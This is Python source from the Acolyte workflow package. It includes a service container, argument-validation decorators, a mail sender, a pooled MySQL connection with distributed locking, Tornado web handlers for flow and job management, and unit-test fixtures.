class ServiceDefination:
"""服务相关的meta数据
"""
def __init__(self, service_id, service_obj,
init_callback=None, lazy=False, finalize=None):
self._service_id = service_id
self._service_obj = service_obj
self._init_callback = init_callback
self._lazy = lazy
self._inited = False
self._finalize = finalize
@property
def service_id(self):
return self._service_id
@property
def service_obj(self):
return self._service_obj
@property
def init_callback(self):
return self._init_callback
@property
def lazy(self):
return self._lazy
@property
def finalize(self):
return self._finalize
    def has_inited(self):
        """Whether initialization has already been performed.
        """
        return self._inited

    def init(self):
        """Run initialization (at most once).
        """
        if self._inited:
            # already initialized, raise
            raise ServiceAlreadyInitedException(self._service_id)
        if self._init_callback is not None:
            self._init_callback(self._service_obj)
        self._inited = True

    def after_register(self):
        """Called back on this definition once container registration completes.
        """
if not hasattr(self._service_obj, "_after_register"):
return
self._service_obj._after_register()
class ServiceAlreadyInitedException(EasemobFlowException):
def __init__(self, service_id):
super().__init__(
"Service '{service_id}' already inited.".format(service_id)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/service_container.py | service_container.py |
import re
import locale
from functools import wraps
from typing import Any
from types import FunctionType
from acolyte.exception import EasemobFlowException
from acolyte.core.message import (
messages,
default_validate_messages
)
from acolyte.core.service import Result
from acolyte.util.lang import get_from_nested_dict
class Field:
"""该类型对象用于描述一个字段的类型、转换规则、验证逻辑等等
"""
def __init__(self, name: str, type_: type, required: bool=True,
default: Any=None,
value_of: type or FunctionType or None=None,
check_logic: FunctionType or None=None):
"""
:param name: 字段名称
:param type_: 期待类型
:param required: 该字段是否是必须的
:param default: 如果不是必须的,该字段的默认值
:param value_of: 如果类型不匹配,回调该函数进行转换
:param check_logic: 验证逻辑
"""
self._name = name
self._type = type_
self._required = required
self._default = default
self._value_of = value_of
self._check_logic = check_logic
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def required(self):
return self._required
@property
def default(self):
return self._default
def __call__(self, value: Any) -> Any:
"""调用call完成对目标值的转换和检查
"""
value = self._base_check(value)
value = self._customize_check(value)
# 检查逻辑
if self._check_logic is not None:
_result = self._check_logic(self._name, value)
if _result is not None:
value = _result
# 返回最终转换的结果
return value
def _base_check(self, value: Any) -> Any:
# 必须且为空,抛出异常
if self._required and (value is None or value == ""):
raise InvalidFieldException(self._name, value, "empty", "")
# 非必须且为空,返回默认值
if not self._required and (value is None or value == ""):
return self._default
# 类型与期望不符,
if not isinstance(value, self._type):
if self._value_of is not None:
try:
value = self._value_of(value)
except Exception:
raise InvalidFieldException(
self._name, value, "invalid_type", self._type.__name__)
else:
raise InvalidFieldException(
self._name, value, "invalid_type", self._type.__name__)
return value
def _customize_check(self, value):
"""自定义检查,子类可以实现
"""
return value
class IntField(Field):
"""该类型对象用于描述一个整数值的验证规则
"""
def __init__(self, name: str, required: bool=True,
default: int=0, value_of: type or FunctionType or None=int,
min_: int or None=None, max_: int or None=None,
check_logic: FunctionType or None=None):
"""
:param min: 最小值
:param max: 最大值
"""
super().__init__(
name=name,
type_=int,
required=required,
default=default,
value_of=value_of,
check_logic=check_logic
)
self._min, self._max = min_, max_
@property
def min(self):
return self._min
@property
def max(self):
return self._max
def _customize_check(self, value):
# 比最小值还要小
if self._min is not None and value < self._min:
raise InvalidFieldException(
self._name, value, "less_than_min", self._min)
# 比最大值还大
if self._max is not None and value > self._max:
raise InvalidFieldException(
self._name, value, "more_than_max", self._max)
return value
class StrField(Field):
"""该类型对象用于描述一个字符串值的验证规则
"""
def __init__(self, name: str, required: bool=True,
default: int=0, value_of: type or FunctionType or None=str,
min_len: int or None=None, max_len: int or None=None,
regex: str or None=None,
check_logic: FunctionType or None=None):
"""
:param min_length: 允许的最小长度
:param max_length: 允许的最大长度
:param regex: 满足的正则表达式
"""
super().__init__(
name=name,
type_=str,
required=required,
default=default,
value_of=value_of,
check_logic=check_logic
)
self._min_len, self._max_len = min_len, max_len
self._regex = regex
@property
def min_len(self):
return self._min_len
@property
def max_len(self):
return self._max_len
@property
def regex(self):
return self._regex
def _customize_check(self, value):
# 检查长度
val_length = len(value)
if self._min_len is not None and val_length < self._min_len:
raise InvalidFieldException(
self._name, value, "less_than_min_length", self._min_len)
if self._max_len is not None and val_length > self._max_len:
raise InvalidFieldException(
self._name, value, "more_than_max_length", self._max_len)
if self._regex is not None and not re.search(self._regex, value):
raise InvalidFieldException(
self._name, value, "invalid_format", self._regex)
return value
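

# Illustrative sketch (not part of the original module): how the field objects
# above convert and validate a single value when called. The field names and
# values are made up.
def _example_field_usage():
    age_field = IntField("age", required=True, min_=0, max_=150)
    name_field = StrField("name", required=True, min_len=1, max_len=20,
                          regex=r"^\w+$")
    age = age_field("42")             # value_of=int converts the string to 42
    name = name_field("acolyte")
    try:
        age_field(-1)                 # below min_ -> InvalidFieldException
    except InvalidFieldException as e:
        reason = e.reason             # "less_than_min"
    return age, name, reason
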
class InvalidFieldException(EasemobFlowException):
"""当字段不满足Rule对象的期望条件时,抛出此异常
"""
def __init__(self, field_name, value, reason, expect):
"""
:param field_name: 字段名称
:param value: 字段值
:param reason: 引发错误原因
:param expect: 期望的类型/值/规则
"""
self._field_name = field_name
self._value = value
self._reason = reason
self._expect = expect
super().__init__((
"Invalid field {field}={value}, "
"reason={reason}, expect={expect}"
).format(field=field_name, value=value, reason=reason, expect=expect))
@property
def field_name(self):
return self._field_name
@property
def value(self):
return self._value
@property
def reason(self):
return self._reason
@property
def expect(self):
return self._expect
class BadReq(Exception):
"""被check修饰的服务接口抛出此异常,可以直接返回bad request result
"""
def __init__(self, reason, **args):
self._reason = reason
self._args = args
@property
def reason(self):
return self._reason
@property
def args(self):
return self._args
def check(*fields, messages=messages,
default_validate_messages=default_validate_messages):
"""该decorator用在service对象方法上验证参数
:param fields: 参数规则声明
:pram messages: 消息集合
"""
fields_dict = {f.name: f for f in fields}
def _check(f):
@wraps(f)
def _func(self, *args, **kwds):
nonlocal fields_dict
try:
# 组装并验证参数
new_args = [field(arg_val)
for field, arg_val in zip(fields, args)]
new_kwds = {arg_name: fields_dict[arg_name](arg_val)
for arg_name, arg_val in kwds.items()}
except InvalidFieldException as e:
full_reason = "{field_name}_{reason}".format(
field_name=e.field_name, reason=e.reason)
loc, _ = locale.getlocale(locale.LC_CTYPE)
service_id = self.__class__.__name__
mtd_name = f.__name__
# 先从用户messages集合中获取
msg = get_from_nested_dict(
messages, loc, service_id, mtd_name, full_reason)
if msg is None:
# 用户messages集合取不到再取默认的
msg = default_validate_messages[loc][e.reason]
                    if e.expect is not None and e.expect != "":
msg = msg.format(
field_name=e.field_name, expect=e.expect)
else:
msg = msg.format(field_name=e.field_name)
else:
                    if e.expect is not None and e.expect != "":
msg = msg.format(expect=e.expect)
return Result.bad_request(full_reason, msg=msg)
else:
try:
return f(self, *new_args, **new_kwds)
except BadReq as e:
loc, _ = locale.getlocale(locale.LC_CTYPE)
msg = messages[loc][
self.__class__.__name__][f.__name__][e.reason]
if e.args:
msg = msg.format(**e.args)
return Result.bad_request(e.reason, msg=msg)
return _func
return _check
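

# Illustrative sketch (not part of the original module): applying the check
# decorator to a service-style method. DemoService is made up; self only needs a
# class name for message lookup, so a plain class is enough here. Result comes
# from the import at the top of this module.
def _example_check_usage():

    class DemoService:

        @check(IntField("user_id", required=True, min_=1))
        def get_user(self, user_id):
            return Result.ok(data={"id": user_id})

    service = DemoService()
    rs = service.get_user(user_id="3")   # "3" is converted to int 3 by the field
    # An invalid value (e.g. user_id=0) would be turned into
    # Result.bad_request("user_id_less_than_min", ...) instead of raising.
    return rs
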
def declare_args(*fields):
"""该decorator用于在方法上声明验证规则
被修饰的方法对象会拥有一个field_rules对象
:param fields: 被修饰函数的参数规则集合
"""
def _declare_args(f):
f.field_rules = fields
@wraps(f)
def _func(*args, **kwds):
return f(*args, **kwds)
return _func
    return _declare_args


# ======================================================================
# File: acolyte/util/mail.py
# ======================================================================
import smtplib
from email import encoders
from email.header import Header
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class Attachment:
    """Describes a single e-mail attachment."""

    def __init__(self, filepath, mime_type, attachment_filename):
        """
        :param filepath: path of the file to attach (or a file-like object)
        :param mime_type: MIME type of the attachment, e.g. "text/plain"
        :param attachment_filename: file name shown in the mail
        """
        self._filepath = filepath
        self._mime_type = mime_type
        self._attachment_filename = attachment_filename

    def build_mime_object(self):
        """Build the MIME part for this attachment."""
        main_type, sub_type = self._mime_type.split("/")
        mime = MIMEBase(main_type, sub_type)
        mime.set_payload(self._gen_payload())
        encoders.encode_base64(mime)
        mime.add_header(
            'Content-Disposition',
            'attachment; filename="{}"'.format(self._attachment_filename))
        return mime

    def _gen_payload(self):
        # a plain string is treated as a file path
        if isinstance(self._filepath, str):
            with open(self._filepath, "rb") as f:
                return f.read()
        # otherwise assume a file-like object (file, BytesIO, StringIO, ...)
        self._filepath.seek(0)
        return self._filepath.read()
def send_mail(receiver, subject, content,
encoding="utf-8", attachments=None):
"""调用该函数可以发送邮件
:param receiver: 收件人
:param sender: 发件人
:param subject: 主题
:param content: 邮件正文
:param encoding: 编码
:param attachments: 附件列表
"""
global _smtp_config
smtp_server = smtplib.SMTP(
host=_smtp_config.host,
port=_smtp_config.port
)
smtp_server.login(_smtp_config.account, _smtp_config.password)
try:
msg = MIMEMultipart()
msg['From'] = _smtp_config.sender
msg['To'] = receiver
msg['Subject'] = Header(subject, encoding)
msg.attach(MIMEText(content, "html", encoding))
if attachments:
for attachment in attachments:
msg.attach(attachment.build_mime_object())
smtp_server.sendmail(
_smtp_config.sender,
[email_address.strip() for email_address in receiver.split(",")],
msg.as_string()
)
finally:
smtp_server.quit()
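

# Illustrative sketch (not part of the original module): sending a mail with one
# attachment. load_smtp_config must run first (the bootstrap does this); every
# address, host and file path below is made up, so this would only actually send
# against a real SMTP server.
def _example_send_mail():
    load_smtp_config({"smtp": {
        "host": "smtp.example.com", "port": 25,
        "account": "bot@example.com", "password": "secret",
        "sender": "bot@example.com"}})
    send_mail(
        receiver="dev@example.com, qa@example.com",
        subject="build finished",
        content="<p>The nightly build finished.</p>",
        attachments=[Attachment("/tmp/build.log", "text/plain", "build.log")])
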
class SMTPConfig:
"""SMTP服务配置
"""
def __init__(self, host, port, account, password, sender, ssl=False):
self._host = host
self._port = port
self._account = account
self._password = password
self._sender = sender
self._ssl = ssl
@property
def host(self):
return self._host
@property
def port(self):
return self._port
@property
def account(self):
return self._account
@property
def password(self):
return self._password
@property
def sender(self):
return self._sender
def load_smtp_config(config):
"""加载smtp的相关配置
"""
global _smtp_config
    _smtp_config = SMTPConfig(**config["smtp"])


# ======================================================================
# File: acolyte/util/lang.py
# ======================================================================
import inspect
import threading
def to_str(obj, *fields):
"""该函数用于方便生成__repr__和__str__方法的返回内容
:param obj: 目标对象
:param fields: 目标属性,如果不指定,则会返回所有
"""
# if fields is empty, auto get fields
if not fields:
try:
fields = obj.__dict__.keys()
except AttributeError:
# maybe slots class
fields = obj.__slots__
str_buf = [
"{class_name}@{id_} <",
]
for idx, field in enumerate(fields):
if isinstance(field, str):
# 单纯str
str_buf.append("{field}={value}".format(
field=field, value=getattr(obj, field)))
elif isinstance(field, tuple):
# 包含callback处理
field, callback = field
str_buf.append("{field}={value}".format(
field=field, value=callback(getattr(obj, field))))
else:
# 其它类型不支持
raise AttributeError("Unsupport field type: '{clazz}'".format(
clazz=field.__class__.__name__))
if idx < len(fields) - 1:
str_buf.append(", ")
str_buf.append(">")
return "".join(str_buf).format(
class_name=obj.__class__.__name__,
id_=id(obj)
)
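

# Illustrative sketch (not part of the original module): a typical __repr__ built
# on to_str. The Point class is made up.
def _example_to_str():

    class Point:

        def __init__(self, x, y):
            self.x, self.y = x, y

        def __repr__(self):
            # renders like "Point@4401234 <x=1, y=2>"
            return to_str(self, "x", ("y", str))

    return repr(Point(1, 2))
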
def get_from_nested_dict(d, *keys, default=None):
"""从嵌套字典中获取值,如果在某一层级获取不到,则返回None
:param d: 目标字典
:param keys: 层级key列表
"""
for k in keys:
try:
d = d[k]
except KeyError:
return default
return d
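

# Illustrative sketch (not part of the original module): looking up a nested
# message key the way the check decorator in acolyte.util.validate does. The
# dict below is made up.
def _example_nested_lookup():
    msgs = {"zh_CN": {"UserService": {"login": {"email_empty": "email is empty"}}}}
    hit = get_from_nested_dict(
        msgs, "zh_CN", "UserService", "login", "email_empty")
    miss = get_from_nested_dict(
        msgs, "en_US", "UserService", "login", "email_empty", default="not found")
    return hit, miss    # -> ("email is empty", "not found")
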
def get_full_class_name(cls):
"""获取一个类的完整名称 包名.类名
"""
return cls.__module__ + "." + cls.__name__
_source_cache = {}
_source_cache_lock = threading.Lock()
def get_source_code(obj):
"""获取对象源码,inspect的这个效率啊,真是比鸭嘴笔还要efficiency!
"""
if obj not in _source_cache:
with _source_cache_lock:
if obj not in _source_cache:
_source_cache[obj] = inspect.getsource(obj)
return _source_cache[obj]
def trim_paragraph(text):
if not text:
return ""
buf = []
for line in text.splitlines():
buf.append(line.strip())
return "\n".join(buf) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/lang.py | lang.py |
import time
import pymysql
from queue import Queue
from contextlib import contextmanager
from acolyte.util import log
class ConnectionPool:
"""
基于Queue的数据库连接池
"""
def __init__(self, config, max_pool_size=20):
self.config = config
self.max_pool_size = max_pool_size
self._initialize_pool()
log.acolyte.info(
"init pool config: max_pool_size = {}".format(max_pool_size))
def _initialize_pool(self):
self.pool = Queue(maxsize=self.max_pool_size)
for _ in range(0, self.max_pool_size):
conn = _PooledMySQLConnection(**self.config)
self.pool.put_nowait(conn)
log.acolyte.debug((
"init db connection "
"host = {host}, port = {port}, "
"user = {user}, db = {db}"
).format(**self.config))
@contextmanager
def connection(self):
# returns a db instance when one is available else waits until one is
connection = self.pool.get(True)
yield connection
self.return_connection(connection)
def return_connection(self, db):
return self.pool.put_nowait(db)
def close_all(self):
"""关闭所有连接,容器析构的时候回调
"""
while not self.is_empty():
self.pool.get().close()
def is_empty(self):
return self.pool.empty()
def query_one(self, sql, args, mapper=None):
def callback(cursor):
nonlocal sql, args
num = cursor.execute(sql, args)
if num:
return cursor.fetchone()
return None
result = self.cursor_callback(callback)
if result is None:
return result
if mapper is None:
return result
return mapper(result)
def query_one_field(self, sql, args):
record = self.query_one(sql, args)
if not record:
return None
return tuple(record.values())[0]
def query_all(self, sql, args, mapper=None):
def callback(cursor):
nonlocal sql, args
num = cursor.execute(sql, args)
if num:
return cursor.fetchall()
return []
results = self.cursor_callback(callback)
if mapper is None:
return results
return [mapper(r) for r in results]
def execute(self, sql, args):
def callback(cursor):
nonlocal sql, args
num = cursor.execute(sql, args)
return num
row_num = self.cursor_callback(callback)
return row_num
def executemany(self, sql, args):
def callback(cursor):
nonlocal sql, args
cursor.executemany(sql, args)
self.cursor_callback(callback)
def cursor_callback(self, callback):
with self.connection() as conn:
with conn.cursor() as cursor:
rs = callback(cursor)
conn.commit()
return rs
@contextmanager
def lock(self, lock_key, wait_timeout=-1):
"""基于MySQL的分布式锁,详情请参见mysql的get_lock函数
:param lock_key: 锁关键字,通过该关键字来标识一个锁
:param wait_timeout: 等待超时时间,如果为负数,那么永不超时
"""
with self.connection() as conn:
with conn.cursor() as cursor:
cursor.execute("select get_lock(%s, %s) as l",
(lock_key, wait_timeout))
rs = cursor.fetchone()
yield rs['l'] == 1
cursor.execute("select release_lock(%s)", (lock_key,))
class _PooledMySQLConnection:
"""该类型对象表示一个被池化的连接
"""
def __init__(self, host, port, user, password, db,
charset="utf8", cursorclass=pymysql.cursors.DictCursor,
ping_interval=60):
self._connection = pymysql.connect(
host=host,
port=port,
user=user,
password=password,
db=db,
charset=charset,
            cursorclass=cursorclass)
self._last_ping = time.time()
self._ping_interval = ping_interval
def _ping(self):
if time.time() - self._last_ping >= self._ping_interval:
need_re_connect = False
try:
with self._connection.cursor() as csr:
csr.execute("SELECT 1", tuple())
result = csr.fetchone()
if not result:
need_re_connect = True
except pymysql.err.OperationalError:
need_re_connect = True
if need_re_connect:
self._connection.connect()
def cursor(self):
self._ping()
return self._connection.cursor()
def commit(self):
return self._connection.commit()
def close(self):
return self._connection.close()
def rollback(self):
return self._connection.rollback()
def load_db_config(config):
db_pool_cfg = config.get("db_pool", {})
max_pool_size = db_pool_cfg.get("pool_size", 10)
db_connect_cfg = config.get("db", {
"host": "localhost",
"port": 3306,
"user": "root",
"password": "",
"db": "easemob_flow",
})
connection_pool = ConnectionPool(db_connect_cfg, max_pool_size)
globals()["default"] = connection_pool
    return connection_pool


# ======================================================================
# File: acolyte/web/flow.py
# ======================================================================
from collections import OrderedDict
import simplejson as json
from acolyte.web import (
BaseWebHandler,
check_token
)
from acolyte.core.service import Result
from acolyte.core.job import ActionArg
class FlowMetaHandler(BaseWebHandler):
@check_token
def get(self, flow_meta_name):
"""查询某个FlowMeta的详情
"""
flow_service = self._("FlowService")
rs = flow_service.get_flow_meta_info(flow_meta_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
flow_templates_rs = flow_service\
.get_flow_templates_by_flow_meta_name(flow_meta_name)
self.render(
"flow_meta_details.html",
flow_meta_name=flow_meta_name,
flow_meta_details=rs.data,
flow_templates=flow_templates_rs.data
)
class ViewTemplateHandler(BaseWebHandler):
@check_token
def get(self, flow_template_id):
"""查询某个FlowTemplate的详情
"""
flow_service = self._("FlowService")
rs = flow_service.get_flow_template(flow_template_id)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
# 判断有无绑定参数
bind_args = rs.data.bind_args
action_num, empty_num = 0, 0
for step_name in bind_args:
for action in bind_args[step_name]:
action_num += 1
if not bind_args[step_name][action]:
empty_num += 1
bind_args_json = json.dumps(
bind_args, indent=4, ensure_ascii=False)
config_json = json.dumps(
rs.data.config, indent=4, ensure_ascii=False)
return self.render(
"flow_template_details.html",
details=rs.data,
bind_args_empty=action_num == empty_num,
bind_args_json=bind_args_json,
config_json=config_json
)
class CreateTemplateHandler(BaseWebHandler):
@check_token
def get(self):
"""显示创建flow template页面
"""
flow_meta_name = self.get_query_argument("meta")
flow_service = self._("FlowService")
rs = flow_service.get_flow_meta_info(flow_meta_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
flow_meta_details = rs.data
return self.render(
"create_flow_template.html",
flow_meta_details=flow_meta_details,
bind_args=self._render_bind_args_tpl(flow_meta_details)
)
def _render_bind_args_tpl(self, flow_meta_details):
"""渲染bind_args模板
"""
job_mgr = self._("job_manager")
bind_args = OrderedDict()
for job_ref in flow_meta_details.jobs:
job_name = job_ref.job_name
job_define = job_mgr.get(job_name)
bind_args[job_ref.step_name] = {
action: self._render_act_args_tpl(job_define.job_args[action])
for action in job_define.job_args}
return bind_args
def _render_act_args_tpl(self, action_args):
return {
a.name: {
"type": a.field_info.type.__name__,
"value": a.field_info.default,
"mark": a.mark,
"comment": a.comment
} for a in action_args
if a.mark != ActionArg.MARK_CONST
}
@check_token
def post(self):
"""执行创建, 需要Ajax请求
"""
(
            flow_meta_name,
name,
max_run_instance,
config,
bind_args
) = self._form(
"flow_meta",
"name",
"max_run_instance",
"config",
"bind_args"
)
config = _parse_json(config)
# config json解析失败
if config is None:
self._output_result(Result.bad_request(
"invalid_config_fmt", msg="Config JSON格式有误"))
return
bind_args = _parse_json(bind_args)
# bind_args json解析失败
if bind_args is None:
self._output_result(Result.bad_request(
"invalid_bind_args_fmt", msg="Bind args JSON格式有误"))
return
rs = self._("FlowService").create_flow_template(
            flow_meta_name=flow_meta_name,
name=name,
bind_args=bind_args,
max_run_instance=max_run_instance,
config=config,
creator=self.request.current_user.id
)
self._output_result(rs)
class ModifyTemplateHandler(BaseWebHandler):
@check_token
def post(self):
"""修改Flow template配置
"""
(
tpl_id,
name,
bind_args_json,
max_run_instance,
config_json
) = self._form(
"tpl_id",
"name",
"bind_args",
"max_run_instance",
"config"
)
config = _parse_json(config_json)
# config解析错误
if config is None:
self._output_result(Result.bad_request(
"invalid_config_fmt", msg="Config JSON格式有误"))
return
bind_args = _parse_json(bind_args_json)
# bind_args 解析错误
if bind_args is None:
self._output_result(Result.bad_request(
"invalid_bind_args_fmt", msg="Bind args JSON格式有误"))
return
# 执行修改
rs = self._("FlowService").modify_flow_template(
flow_tpl_id=tpl_id,
name=name,
bind_args=bind_args,
max_run_instance=max_run_instance,
config=config
)
self._output_result(rs)
class ViewFlowInstanceHandler(BaseWebHandler):
@check_token
def get(self, flow_instance_id):
"""FlowInstance终端页
"""
flow_service = self._("FlowService")
job_mgr = self._("job_manager")
rs = flow_service.get_flow_instance_details(flow_instance_id)
if rs.is_success():
flow_meta_info = flow_service.get_flow_meta_info(
rs.data.flow_tpl.flow_meta_name).data
jobs = {
job_ref.job_name: job_mgr.get(job_ref.job_name)
for job_ref in flow_meta_info.jobs
}
steps = {step.step_name: step for step in rs.data.steps}
self.render(
"flow_instance_details.html",
details=rs.data,
flow_meta_info=flow_meta_info,
jobs=jobs,
steps=steps
)
else:
self.render("tip.html", msg=rs.msg)
def _parse_json(json_str):
if not json_str:
return {}
else:
try:
return json.loads(json_str)
        except Exception:
return None
class DiscardFlowInstanceHandler(BaseWebHandler):
@check_token
def post(self):
flow_exec_service = self._("FlowExecutorService")
flow_instance_id, reason = self._form("flow_instance_id", "reason")
actor_id = self.request.current_user.id
rs = flow_exec_service.discard_flow_instance(
int(flow_instance_id), actor_id, reason)
self._output_result(rs)
class ViewFlowGroupDetailsHandler(BaseWebHandler):
@check_token
def get(self, group_id):
flow_service = self._("FlowService")
rs = flow_service\
.get_flow_instance_group_details(group_id)
self.render("flow_group_details.html", details=rs.data) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/web/flow.py | flow.py |
from acolyte.web import (
BaseWebHandler,
check_token
)
from acolyte.core.service import Result
from acolyte.core.storage.job_instance import JobInstanceDAO
class ViewJobDetailsHandler(BaseWebHandler):
@check_token
def get(self, job_name):
job_service = self._("JobService")
rs = job_service.get_job_details_by_name(job_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
return self.render(
"job_details.html",
details=rs.data
)
class ViewJobInstanceDetailsHandler(BaseWebHandler):
@check_token
def get(self, job_instance_id, original=None):
rs = self._("JobService")\
.get_job_instance_details(job_instance_id)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
job_instance_details = rs.data
job_mgr = self._("job_manager")
job_define = job_mgr.get(job_instance_details.job_name)
if job_define.ui is None or original == "original":
self.render(
"job_instance_details.html",
details=job_instance_details,
job_define=job_define
)
else:
content = job_define.ui.render_instance_details_page(
details=job_instance_details,
job_define=job_define,
request=self.request
)
self.render(
"customize_job_instance_details.html",
content=content
)
class JobDecisionHandler(BaseWebHandler):
@check_token
def get(self, job_instance_id, decision_name):
"""渲染展示Decision页面
"""
rs = self._("JobService").get_decision_info(
job_instance_id, decision_name)
if not rs.is_success():
self.render("tip.html", msg=rs.msg)
return
self.render(
"job_decision.html",
details=rs.data,
instance_id=job_instance_id
)
@check_token
def post(self, job_instance_id, action):
"""执行选择的Action
"""
job_instance_dao = JobInstanceDAO(self._("db"))
job_instance = job_instance_dao.query_by_id(job_instance_id)
if job_instance is None:
self._output_result(
Result.bad_request(
"job_instance_not_found",
msg="找不到指定的Job instance: {}".format(job_instance.id))
)
return
action_args = {
name: value_list[0].decode("utf-8")
for name, value_list in self.request.arguments.items()}
self._print_json(action_args)
flow_executor_service = self._("FlowExecutorService")
rs = flow_executor_service.handle_job_action(
flow_instance_id=job_instance.flow_instance_id,
target_step=job_instance.step_name,
target_action=action,
actor=self.request.current_user.id,
action_args=action_args
)
self._print_json(rs)
        self._output_result(rs)


# ======================================================================
# File: acolyte/web/__init__.py
# ======================================================================
import datetime
from functools import wraps
from acolyte.util.json import to_json
from tornado.web import RequestHandler
class BaseWebHandler(RequestHandler):
def _(self, service_id):
return BaseWebHandler.service_container.get_service(service_id)
def _form(self, *field_names, strip=True):
return [
self.get_body_argument(field_name, "", strip=strip)
for field_name in field_names
]
def _query_args(self, *field_names, strip=True):
return [
self.get_query_argument(field_name, "", strip=strip)
for field_name in field_names
]
def _date_scope(self, prefix=""):
(
begin_year_str,
begin_month_str,
begin_day_str,
end_year_str,
end_month_str,
end_day_str
) = self._query_args(
"begin_year",
"begin_month",
"begin_day",
"end_year",
"end_month",
"end_day"
)
return datetime.date(
year=int(begin_year_str),
month=int(begin_month_str),
day=int(begin_day_str)
), datetime.date(
year=int(end_year_str),
month=int(end_month_str),
day=int(end_day_str)
)
def _print_json(self, obj):
"""打印json,供调试使用
"""
print(to_json(obj))
def _output_result(self, rs):
"""将result对象按照json的格式输出
"""
self.set_header('Content-Type', 'application/json')
self.write(to_json(rs))
self.finish()
class ReqUser:
@classmethod
def from_session_data(cls, session_data):
return cls(
id_=session_data["id"],
email=session_data["session_data"]["email"],
name=session_data["session_data"]["name"]
)
def __init__(self, id_, email, name):
self._id = id_
self._email = email
self._name = name
@property
def id(self):
return self._id
@property
def email(self):
return self._email
@property
def name(self):
return self._name
def check_token(func):
@wraps(func)
def _f(self, *args, **kwds):
token = self.get_secure_cookie("_t")
if token is None:
self.redirect("/login?redirect={}".format(self.request.uri))
return
token = token.decode("utf-8")
rs = self._("UserService").check_token(token)
if rs.is_success():
self.request._token = token
self.request.current_user = ReqUser.from_session_data(rs.data)
return func(self, *args, **kwds)
else:
self.redirect("/login?redirect={}".format(self.request.uri))
return
return _f | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/web/__init__.py | __init__.py |
import os
import atexit
import fixtures
from concurrent.futures import ThreadPoolExecutor
from acolyte.util.service_container import ServiceContainer
from acolyte.core.bootstrap import AbstractBootstrap
from acolyte.testing.core.mgr_define import (
flow_meta_mgr,
job_mgr,
notify_tpl_mgr
)
from acolyte.util import db
from acolyte.util import log
from acolyte.util.json import to_json
from acolyte.core.service import Result
from acolyte.core.flow_service import FlowService
from acolyte.core.user_service import UserService
from acolyte.core.job_service import JobService
from acolyte.core.flow_executor_service import FlowExecutorService
from acolyte.core.notify_logic import NotifyLogic
from acolyte.core.storage.flow_template import FlowTemplateDAO
from acolyte.core.storage.flow_instance import FlowInstanceDAO
from acolyte.core.storage.job_instance import JobInstanceDAO
from acolyte.core.storage.job_action_data import JobActionDataDAO
from acolyte.core.context import AbstractFlowContext
from acolyte.util.conf import load_from_py_module
from acolyte.util.mail import load_smtp_config
class UnitTestBootstrap(AbstractBootstrap):
def __init__(self):
super().__init__()
def start(self, config):
log.load_logger_config(config)
self.service_container = ServiceContainer()
atexit.register(self.service_container.finalize)
load_smtp_config(config)
self._binding(config, self.service_container)
def _binding(self, config, service_container):
db_pool = db.load_db_config(config)
service_container.register(
service_id="db",
service_obj=db_pool,
finalize=lambda: db_pool.close_all()
)
service_container.register(
service_id="job_manager",
service_obj=job_mgr
)
service_container.register(
service_id="flow_meta_manager",
service_obj=flow_meta_mgr
)
service_container.register(
service_id="notify_tpl_manager",
service_obj=notify_tpl_mgr
)
notify_executor = ThreadPoolExecutor(10)
service_container.register(
service_id="notify_executor",
service_obj=notify_executor,
finalize=lambda: notify_executor.shutdown()
)
service_container.register_service(FlowService)
service_container.register_service(UserService)
service_container.register_service(JobService)
service_container.register_service(FlowExecutorService)
service_container.register_service(NotifyLogic)
service_container.after_register()
def load_config():
return load_from_py_module(
os.environ.get(
"ACOLYTE_TEST_CONFIG", "config/acolyte_test_config.py"))
_test_bootstrap = UnitTestBootstrap()
_test_bootstrap.start(load_config())
test_container = _test_bootstrap.service_container
class EasemobFlowTestCase(fixtures.TestWithFixtures):
def _(self, service_id):
"""从容器中获取服务
"""
global test_container
self._test_container = test_container
return test_container.get_service(service_id)
def print_json(self, obj):
print(to_json(obj, indent=4 * ' '))
def assertResultSuccess(self, result):
self.assertEqual(result.status_code, Result.STATUS_SUCCESS)
def assertResultBadRequest(self, result, reason):
self.assertEqual(result.status_code, Result.STATUS_BADREQUEST)
self.assertEqual(result.reason, reason)
class FlowTemplateFixture(fixtures.Fixture):
"""该fixture可以用来创建和销毁FlowTemplate对象
"""
def __init__(self, flow_meta_name, tpl_name, bind_args, max_run_instance,
config, creator, service_container):
self._flow_meta_name = flow_meta_name
self._tpl_name = tpl_name
self._bind_args = bind_args
self._max_run_instance = max_run_instance
self._config = config
self._creator = creator
self._flow_service = service_container.get("FlowService")
self._flow_tpl_dao = FlowTemplateDAO(service_container.get("db"))
@property
def flow_template(self):
return self._flow_template
def setUp(self):
self._flow_template = self._flow_service.create_flow_template(
flow_meta_name=self._flow_meta_name,
name=self._tpl_name,
bind_args=self._bind_args,
max_run_instance=self._max_run_instance,
config=self._config,
creator=self._creator
).data
def cleanUp(self):
self._flow_tpl_dao.delete_by_id(self._flow_template.id)
class FlowInstanceFixture(fixtures.Fixture):
"""该fixture可以用来创建和销毁FlowInstance
"""
def __init__(self, tpl_id, initiator, description,
start_flow_args, service_container):
self._tpl_id = tpl_id
self._initiator = initiator
self._description = description
self._start_flow_args = start_flow_args
self._flow_executor_service = service_container.get(
"FlowExecutorService")
_db = service_container.get("db")
self._flow_instance_dao = FlowInstanceDAO(_db)
self._job_instance_dao = JobInstanceDAO(_db)
self._job_action_data_dao = JobActionDataDAO(_db)
@property
def flow_instance(self):
return self._flow_instance
def setUp(self):
self._flow_instance = self._flow_executor_service.start_flow(
flow_template_id=self._tpl_id,
initiator=self._initiator,
description=self._description,
start_flow_args=self._start_flow_args
).data
def cleanUp(self):
# 清理创建的flow_instance
self._flow_instance_dao.delete_by_instance_id(
self._flow_instance.id)
job_instance_lst = self._job_instance_dao.\
query_by_flow_instance_id(self._flow_instance.id)
# 删除整个flow instance下的job instance
self._job_instance_dao.delete_by_flow_instance_id(
self._flow_instance.id)
# 删除各个job action dat
for job_instance in job_instance_lst:
